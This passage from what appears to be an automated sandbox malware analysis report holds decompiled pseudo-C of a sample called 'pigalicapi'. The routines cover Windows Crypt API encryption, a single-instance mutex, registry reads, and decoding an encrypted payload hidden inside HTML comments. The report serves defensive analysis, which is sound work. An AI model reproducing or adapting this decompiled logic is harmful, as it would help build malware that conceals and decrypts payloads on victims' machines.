                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a2ddc9229a76aa698be45a2cc7e293f60d399dbbfcd14f47a31b8a2cb0b095bf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DD110AB5A04208AFDB01EFE4DC58FFEBBB8AB48704F14814CE611A7241D7B99604CBA4
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B8370(intOrPtr _a4, long _a8, char _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				long _v20;
                                                                                                                                                                                                                                                                            				long _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				void* _v32;
                                                                                                                                                                                                                                                                            				char _v36;
                                                                                                                                                                                                                                                                            				char _v40;
                                                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                                                            				intOrPtr* _v56;
                                                                                                                                                                                                                                                                            				long _v60;
                                                                                                                                                                                                                                                                            				void* _t79;
                                                                                                                                                                                                                                                                            				void* _t80;
                                                                                                                                                                                                                                                                            				void* _t85;
                                                                                                                                                                                                                                                                            				void* _t90;
                                                                                                                                                                                                                                                                            				void* _t94;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0 || _a16 < _a8) {
                                                                                                                                                                                                                                                                            					L17:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_t79 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v16 = _t79;
                                                                                                                                                                                                                                                                            					_t80 = VirtualAlloc(0, 0x1000, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t80;
                                                                                                                                                                                                                                                                            					if(_v16 != 0 && _v12 != 0) {
                                                                                                                                                                                                                                                                            						_v24 = 0x1000;
                                                                                                                                                                                                                                                                            						_v20 = 0x1000;
                                                                                                                                                                                                                                                                            						_t85 = E007B8800(_v16,  &_v24, _v12,  &_v20, 0x7c3378, 0x94); // executed
                                                                                                                                                                                                                                                                            						if(_t85 != 0) {
                                                                                                                                                                                                                                                                            							_t21 = _a8 + 0x10; // 0x1010
                                                                                                                                                                                                                                                                            							_v28 = _v20 + _t21;
                                                                                                                                                                                                                                                                            							_t170 = _a16 - _v28;
                                                                                                                                                                                                                                                                            							if(_a16 >= _v28) {
                                                                                                                                                                                                                                                                            								_v40 = E007B8770(_t170, 0xa);
                                                                                                                                                                                                                                                                            								_v36 = E007B87D0(0xffffffff);
                                                                                                                                                                                                                                                                            								_t90 = VirtualAlloc(0, _a8, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            								_v32 = _t90;
                                                                                                                                                                                                                                                                            								if(_v32 != 0) {
                                                                                                                                                                                                                                                                            									_v44 = _a8;
                                                                                                                                                                                                                                                                            									E007B7B70(_v32, _a4, _a8);
                                                                                                                                                                                                                                                                            									_t94 = E007B8970(_v32,  &_v44, _v16, _v24); // executed
                                                                                                                                                                                                                                                                            									if(_t94 != 0) {
                                                                                                                                                                                                                                                                            										_v48 = _a12;
                                                                                                                                                                                                                                                                            										E007B85D0( &_v48,  &_v40, 4);
                                                                                                                                                                                                                                                                            										E007B85D0( &_v48,  &_v36, 4);
                                                                                                                                                                                                                                                                            										_v60 = 0;
                                                                                                                                                                                                                                                                            										_v56 = _v48;
                                                                                                                                                                                                                                                                            										E007B85D0( &_v48,  &_v60, 4);
                                                                                                                                                                                                                                                                            										_v52 = _v48;
                                                                                                                                                                                                                                                                            										E007B85D0( &_v48,  &_v20, 4);
                                                                                                                                                                                                                                                                            										E007B85D0( &_v48, _v12, _v20);
                                                                                                                                                                                                                                                                            										E007B8650(_v36, _v52, _v48 - _v52, _v36);
                                                                                                                                                                                                                                                                            										E007B85D0( &_v48, _v32, _v44);
                                                                                                                                                                                                                                                                            										 *_v56 = E007B16F0(_a12 + 0xc, _v48 - _a12 + 0xc);
                                                                                                                                                                                                                                                                            										_v8 = _v48 - _a12;
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            									VirtualFree(_v32, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v16 != 0) {
                                                                                                                                                                                                                                                                            						VirtualFree(_v16, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					goto L17;
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            			}






















                                                                                                                                                                                                                                                                            0x007b8376
                                                                                                                                                                                                                                                                            0x007b8381
                                                                                                                                                                                                                                                                            0x007b85c0
                                                                                                                                                                                                                                                                            0x007b85c6
                                                                                                                                                                                                                                                                            0x007b83b1
                                                                                                                                                                                                                                                                            0x007b83bf
                                                                                                                                                                                                                                                                            0x007b83c5
                                                                                                                                                                                                                                                                            0x007b83d6
                                                                                                                                                                                                                                                                            0x007b83dc
                                                                                                                                                                                                                                                                            0x007b83e3
                                                                                                                                                                                                                                                                            0x007b83f3
                                                                                                                                                                                                                                                                            0x007b83fa
                                                                                                                                                                                                                                                                            0x007b841b
                                                                                                                                                                                                                                                                            0x007b8425
                                                                                                                                                                                                                                                                            0x007b8431
                                                                                                                                                                                                                                                                            0x007b8435
                                                                                                                                                                                                                                                                            0x007b843b
                                                                                                                                                                                                                                                                            0x007b843e
                                                                                                                                                                                                                                                                            0x007b844e
                                                                                                                                                                                                                                                                            0x007b845b
                                                                                                                                                                                                                                                                            0x007b846b
                                                                                                                                                                                                                                                                            0x007b8471
                                                                                                                                                                                                                                                                            0x007b8478
                                                                                                                                                                                                                                                                            0x007b8481
                                                                                                                                                                                                                                                                            0x007b8490
                                                                                                                                                                                                                                                                            0x007b84a8
                                                                                                                                                                                                                                                                            0x007b84b2
                                                                                                                                                                                                                                                                            0x007b84bb
                                                                                                                                                                                                                                                                            0x007b84c8
                                                                                                                                                                                                                                                                            0x007b84da
                                                                                                                                                                                                                                                                            0x007b84e2
                                                                                                                                                                                                                                                                            0x007b84ec
                                                                                                                                                                                                                                                                            0x007b84f9
                                                                                                                                                                                                                                                                            0x007b8504
                                                                                                                                                                                                                                                                            0x007b8511
                                                                                                                                                                                                                                                                            0x007b8525
                                                                                                                                                                                                                                                                            0x007b853c
                                                                                                                                                                                                                                                                            0x007b8550
                                                                                                                                                                                                                                                                            0x007b8576
                                                                                                                                                                                                                                                                            0x007b857e
                                                                                                                                                                                                                                                                            0x007b857e
                                                                                                                                                                                                                                                                            0x007b858c
                                                                                                                                                                                                                                                                            0x007b858c
                                                                                                                                                                                                                                                                            0x007b8478
                                                                                                                                                                                                                                                                            0x007b843e
                                                                                                                                                                                                                                                                            0x007b8425
                                                                                                                                                                                                                                                                            0x007b8596
                                                                                                                                                                                                                                                                            0x007b85a3
                                                                                                                                                                                                                                                                            0x007b85a3
                                                                                                                                                                                                                                                                            0x007b85ad
                                                                                                                                                                                                                                                                            0x007b85ba
                                                                                                                                                                                                                                                                            0x007b85ba
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b85ad

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00001000,00003000,00000004), ref: 007B83BF
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00001000,00003000,00000004), ref: 007B83D6
                                                                                                                                                                                                                                                                            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 007B846B
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8970: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000), ref: 007B89BF
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8970: GetLastError.KERNEL32 ref: 007B89C9
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8970: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B89F8
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8970: CryptImportKey.ADVAPI32(00000000,00000000,00000000,00000000,00000001,00000000), ref: 007B8A1F
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8970: CryptEncrypt.ADVAPI32(00000000,00000000,00000001,00000000,00000000,00000000,00000000), ref: 007B8A41
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8970: CryptDestroyKey.ADVAPI32(00000000), ref: 007B8A4E
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8970: CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 007B8A5A
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007B858C
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007B85A3
                                                                                                                                                                                                                                                                            • VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 007B85BA
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8800: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000000,007B8420,00000000,00001000,00000000), ref: 007B883B
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8800: GetLastError.KERNEL32 ref: 007B8845
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8800: CryptAcquireContextA.ADVAPI32(00000000,007BC6E4,Microsoft Enhanced Cryptographic Provider v1.0,00000001,00000008), ref: 007B8874
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8800: CryptGenKey.ADVAPI32(00000000,00006801,?,00000000), ref: 007B88AF
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8800: CryptExportKey.ADVAPI32(00000000,00000000,00000008,00000000,00000000,00000000), ref: 007B88CF
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8800: CryptImportKey.ADVAPI32(00000000,00000000,?,00000000,00000001,?), ref: 007B890C
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8800: CryptExportKey.ADVAPI32(00000000,?,00000001,00000000,00000000,00000000), ref: 007B892A
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8800: CryptDestroyKey.ADVAPI32(?), ref: 007B8937
                                                                                                                                                                                                                                                                              • Part of subcall function 007B87D0: QueryPerformanceCounter.KERNEL32(?), ref: 007B87E7
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Crypt$Virtual$Context$Acquire$AllocFree$DestroyErrorExportImportLast$CounterEncryptPerformanceQueryRelease
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 487564122-0
                                                                                                                                                                                                                                                                            • Opcode ID: 15529e7bfe7b9d9485b40070201a7102a652f1bcf567526050983e2a3ff4b822
                                                                                                                                                                                                                                                                            • Instruction ID: 8f8860d60a6e9e97460ccf096873be8fedd3dd4dc37a6e4d0a8cad0527b6147e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15529e7bfe7b9d9485b40070201a7102a652f1bcf567526050983e2a3ff4b822
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A0712DB5D00209EBDB14DFA4DC85FEEB7B8AF48300F14C119FA15A6281EB789A54CF65
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B5E00() {
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				CreateMutexA(0, 0, "pigalicapi"); // executed
                                                                                                                                                                                                                                                                            				return 0 | GetLastError() == 0x000000b7;
                                                                                                                                                                                                                                                                            			}



                                                                                                                                                                                                                                                                            0x007b5e0c
                                                                                                                                                                                                                                                                            0x007b5e25

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateMutexA.KERNELBASE(00000000,00000000,pigalicapi,?,007B3BEB), ref: 007B5E0C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,007B3BEB), ref: 007B5E12
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateErrorLastMutex
                                                                                                                                                                                                                                                                            • String ID: pigalicapi
                                                                                                                                                                                                                                                                            • API String ID: 1925916568-2184165135
                                                                                                                                                                                                                                                                            • Opcode ID: 5b92a8007812eb0572970039a60d8209b06c34c2de7b2fe1d477e0f002df33f2
                                                                                                                                                                                                                                                                            • Instruction ID: 120f9e7782a496f46b543577a623ba53091659b46a5f8a7096ddec3f2555aecb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5b92a8007812eb0572970039a60d8209b06c34c2de7b2fe1d477e0f002df33f2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFC08CB628431C6BE2001765ED4BF893B88C710F81F60C028F10AF50E1898960408B2A
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B8250(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                                                            				signed int _v12;
                                                                                                                                                                                                                                                                            				signed int _v13;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr _v24;
                                                                                                                                                                                                                                                                            				char _v28;
                                                                                                                                                                                                                                                                            				char _v32;
                                                                                                                                                                                                                                                                            				char* _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				char _t48;
                                                                                                                                                                                                                                                                            				intOrPtr _t51;
                                                                                                                                                                                                                                                                            				intOrPtr _t58;
                                                                                                                                                                                                                                                                            				char _t63;
                                                                                                                                                                                                                                                                            				void* _t77;
                                                                                                                                                                                                                                                                            				void* _t78;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0;
                                                                                                                                                                                                                                                                            					_v20 = _a4;
                                                                                                                                                                                                                                                                            					_v13 = 0;
                                                                                                                                                                                                                                                                            					while(_v12 < _a8 - 0xa && (_v13 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                            						_t48 = "<!--"; // 0x2d2d213c
                                                                                                                                                                                                                                                                            						_v32 = _t48;
                                                                                                                                                                                                                                                                            						_t63 =  *0x7bc700; // 0x0
                                                                                                                                                                                                                                                                            						_v28 = _t63;
                                                                                                                                                                                                                                                                            						_t51 = E007B7AF0(_v20 + _v12, _a8 - _v12,  &_v32, 4);
                                                                                                                                                                                                                                                                            						_t78 = _t77 + 0x10;
                                                                                                                                                                                                                                                                            						_v24 = _t51;
                                                                                                                                                                                                                                                                            						if(_v24 == 0) {
                                                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                                                            							_v12 = _v24 - _a4;
                                                                                                                                                                                                                                                                            							_t28 = _v12 + 4; // 0x4
                                                                                                                                                                                                                                                                            							_v36 = StrStrA(_v20 + _t28, "-->");
                                                                                                                                                                                                                                                                            							if(_v36 != 0) {
                                                                                                                                                                                                                                                                            								_v44 = _v36 - _v24 - 4;
                                                                                                                                                                                                                                                                            								_t58 = E007B8090(_v24 + 4, _v44, _a12, _a16); // executed
                                                                                                                                                                                                                                                                            								_t77 = _t78 + 0x10;
                                                                                                                                                                                                                                                                            								_v40 = _t58;
                                                                                                                                                                                                                                                                            								if(_v40 > 0) {
                                                                                                                                                                                                                                                                            									_v13 = 1;
                                                                                                                                                                                                                                                                            									_v8 = _v40;
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            								_v12 = _v12 + 4;
                                                                                                                                                                                                                                                                            								continue;
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						goto L16;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				L16:
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                                                            0x007b8256
                                                                                                                                                                                                                                                                            0x007b8261
                                                                                                                                                                                                                                                                            0x007b8285
                                                                                                                                                                                                                                                                            0x007b828f
                                                                                                                                                                                                                                                                            0x007b8292
                                                                                                                                                                                                                                                                            0x007b8296
                                                                                                                                                                                                                                                                            0x007b82b1
                                                                                                                                                                                                                                                                            0x007b82b6
                                                                                                                                                                                                                                                                            0x007b82b9
                                                                                                                                                                                                                                                                            0x007b82bf
                                                                                                                                                                                                                                                                            0x007b82d6
                                                                                                                                                                                                                                                                            0x007b82db
                                                                                                                                                                                                                                                                            0x007b82de
                                                                                                                                                                                                                                                                            0x007b82e5
                                                                                                                                                                                                                                                                            0x007b82e7
                                                                                                                                                                                                                                                                            0x007b82ed
                                                                                                                                                                                                                                                                            0x007b82fb
                                                                                                                                                                                                                                                                            0x007b8306
                                                                                                                                                                                                                                                                            0x007b830d
                                                                                                                                                                                                                                                                            0x007b8318
                                                                                                                                                                                                                                                                            0x007b832e
                                                                                                                                                                                                                                                                            0x007b8333
                                                                                                                                                                                                                                                                            0x007b8336
                                                                                                                                                                                                                                                                            0x007b833d
                                                                                                                                                                                                                                                                            0x007b833f
                                                                                                                                                                                                                                                                            0x007b8346
                                                                                                                                                                                                                                                                            0x007b8346
                                                                                                                                                                                                                                                                            0x007b834f
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b835a
                                                                                                                                                                                                                                                                            0x007b830d
                                                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                                                            0x007b82e5
                                                                                                                                                                                                                                                                            0x007b8296
                                                                                                                                                                                                                                                                            0x007b835f
                                                                                                                                                                                                                                                                            0x007b8365

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • StrStrA.SHLWAPI(00000004,-->), ref: 007B8300
                                                                                                                                                                                                                                                                              • Part of subcall function 007B8090: VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004), ref: 007B80D8
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                                                                                                                            • String ID: -->$<!--
                                                                                                                                                                                                                                                                            • API String ID: 4275171209-1166897919
                                                                                                                                                                                                                                                                            • Opcode ID: 7c647603790f51621e7403dc2500ae7310fb046ee90c4de17e56ed8c3f4ee932
                                                                                                                                                                                                                                                                            • Instruction ID: 7b60de5aecf3dee5355f6c4e4c3847b03e67646886ca2511450c703ddac522e0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7c647603790f51621e7403dc2500ae7310fb046ee90c4de17e56ed8c3f4ee932
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B0315D70900249DFDF44DFA8C944BEEBFF5EB48304F188A59E805B7241DB799A44CB96
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007BA400(char* _a4, char* _a8, char* _a12, int _a16) {
                                                                                                                                                                                                                                                                            				int _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				void* _v16;
                                                                                                                                                                                                                                                                            				int _v20;
                                                                                                                                                                                                                                                                            				long _t25;
                                                                                                                                                                                                                                                                            				long _t27;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 != 0 && _a8 != 0 && _a12 != 0 && _a16 != 0) {
                                                                                                                                                                                                                                                                            					_v12 = 0x80000001;
                                                                                                                                                                                                                                                                            					if(( *0x7c435a & 0x000000ff) != 0) {
                                                                                                                                                                                                                                                                            						_v12 = 0x80000002;
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            					_v16 = 0;
                                                                                                                                                                                                                                                                            					_t25 = RegOpenKeyExA(_v12, _a4, 0, 0xf003f,  &_v16); // executed
                                                                                                                                                                                                                                                                            					if(_t25 == 0) {
                                                                                                                                                                                                                                                                            						_v20 = _a16;
                                                                                                                                                                                                                                                                            						_t27 = RegQueryValueExA(_v16, _a8, 0, 0, _a12,  &_v20); // executed
                                                                                                                                                                                                                                                                            						if(_t27 == 0) {
                                                                                                                                                                                                                                                                            							_v8 = _v20;
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						RegCloseKey(_v16); // executed
                                                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                                                            				return _v8;
                                                                                                                                                                                                                                                                            			}









                                                                                                                                                                                                                                                                            0x007ba406
                                                                                                                                                                                                                                                                            0x007ba411
                                                                                                                                                                                                                                                                            0x007ba429
                                                                                                                                                                                                                                                                            0x007ba439
                                                                                                                                                                                                                                                                            0x007ba43b
                                                                                                                                                                                                                                                                            0x007ba43b
                                                                                                                                                                                                                                                                            0x007ba442
                                                                                                                                                                                                                                                                            0x007ba45c
                                                                                                                                                                                                                                                                            0x007ba464
                                                                                                                                                                                                                                                                            0x007ba469
                                                                                                                                                                                                                                                                            0x007ba480
                                                                                                                                                                                                                                                                            0x007ba488
                                                                                                                                                                                                                                                                            0x007ba48d
                                                                                                                                                                                                                                                                            0x007ba48d
                                                                                                                                                                                                                                                                            0x007ba494
                                                                                                                                                                                                                                                                            0x007ba494
                                                                                                                                                                                                                                                                            0x007ba464
                                                                                                                                                                                                                                                                            0x007ba4a0

                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,000F003F,00000000), ref: 007BA45C
                                                                                                                                                                                                                                                                            • RegQueryValueExA.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000), ref: 007BA480
                                                                                                                                                                                                                                                                            • RegCloseKey.KERNELBASE(00000000), ref: 007BA494
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000003.00000002.812221032.00000000007B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 007B0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_3_2_7b0000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3677997916-0
                                                                                                                                                                                                                                                                            • Opcode ID: d913f85c09de30b9e487ea322a6f80dc0df460644d33846ad7555acb848c837d
                                                                                                                                                                                                                                                                            • Instruction ID: f3e89aa21c7059a42512977d007d334b4bc5f69741800b7249bb8a121743928b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d913f85c09de30b9e487ea322a6f80dc0df460644d33846ad7555acb848c837d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0D110A74A00249FFDB15DF99C848FEEBBB4FB44704F10C558E9149B280D7B89A55CB51
                                                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                            C-Code - Quality: 100%
                                                                                                                                                                                                                                                                            			E007B8090(intOrPtr _a4, long _a8, void** _a12, intOrPtr* _a16) {
                                                                                                                                                                                                                                                                            				long _v8;
                                                                                                                                                                                                                                                                            				void* _v12;
                                                                                                                                                                                                                                                                            				long _v16;
                                                                                                                                                                                                                                                                            				intOrPtr _v20;
                                                                                                                                                                                                                                                                            				intOrPtr* _v24;
                                                                                                                                                                                                                                                                            				intOrPtr _v28;
                                                                                                                                                                                                                                                                            				signed int _v32;
                                                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                                                            				intOrPtr _v44;
                                                                                                                                                                                                                                                                            				int _v48;
                                                                                                                                                                                                                                                                            				long _v52;
                                                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                                                            				intOrPtr _t73;
                                                                                                                                                                                                                                                                            				void* _t91;
                                                                                                                                                                                                                                                                            				void* _t93;
                                                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                                                            				_v8 = 0;
                                                                                                                                                                                                                                                                            				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                            					L13:
                                                                                                                                                                                                                                                                            					return _v8;
                                                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                                                            					_v16 = _a8;
                                                                                                                                                                                                                                                                            					_t71 = VirtualAlloc(0, _v16, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            					_v12 = _t71;
                                                                                                                                                                                                                                                                            					if(_v12 != 0) {
                                                                                                                                                                                                                                                                            						_t73 = E007B1390(_v12, _a4, _v16, _v12, _v16); // executed
                                                                                                                                                                                                                                                                            						_v20 = _t73;
                                                                                                                                                                                                                                                                            						if(_v20 != 0) {
                                                                                                                                                                                                                                                                            							_v24 = _v12;
                                                                                                                                                                                                                                                                            							_v28 = _v20;
                                                                                                                                                                                                                                                                            							_v32 = E007B87B0(_v20,  *_v24) & 0x0000ffff;
                                                                                                                                                                                                                                                                            							if(_v32 == 0xa) {
                                                                                                                                                                                                                                                                            								_v40 =  *((intOrPtr*)(_v24 + 4));
                                                                                                                                                                                                                                                                            								_v44 =  *((intOrPtr*)(_v24 + 8));
                                                                                                                                                                                                                                                                            								_v36 = E007B16F0(_v24 + 0xc, _v28 - 0xc);
                                                                                                                                                                                                                                                                            								if(_v36 == _v44) {
                                                                                                                                                                                                                                                                            									E007B8630(_v24 + 0xc, 4, _v40);
                                                                                                                                                                                                                                                                            									_v48 =  *((intOrPtr*)(_v24 + 0xc));
                                                                                                                                                                                                                                                                            									E007B8630(_v24 + 0x10, _v48, _v40);
                                                                                                                                                                                                                                                                            									_v52 = _v28 - _v48 + 0x10;
                                                                                                                                                                                                                                                                            									_t52 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                            									_t91 = E007B8A70(_v24 + _t52,  &_v52, _v24 + 0x10, _v48, 0x7c3410, 0x254); // executed
                                                                                                                                                                                                                                                                            									if(_t91 != 0) {
                                                                                                                                                                                                                                                                            										_t93 = VirtualAlloc(0, _v52, 0x3000, 4); // executed
                                                                                                                                                                                                                                                                            										 *_a12 = _t93;
                                                                                                                                                                                                                                                                            										if( *_a12 != 0) {
                                                                                                                                                                                                                                                                            											_t60 = _v48 + 0x10; // 0x10
                                                                                                                                                                                                                                                                            											E007B7B70( *_a12, _v24 + _t60, _v52);
                                                                                                                                                                                                                                                                            											 *_a16 = _v52;
                                                                                                                                                                                                                                                                            											_v8 = _v52;
                                                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            						if(_v8 == 0) {
                                                                                                                                                                                                                                                                            							VirtualFree(_v12, 0, 0x8000); // executed
                                                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                                                            					}
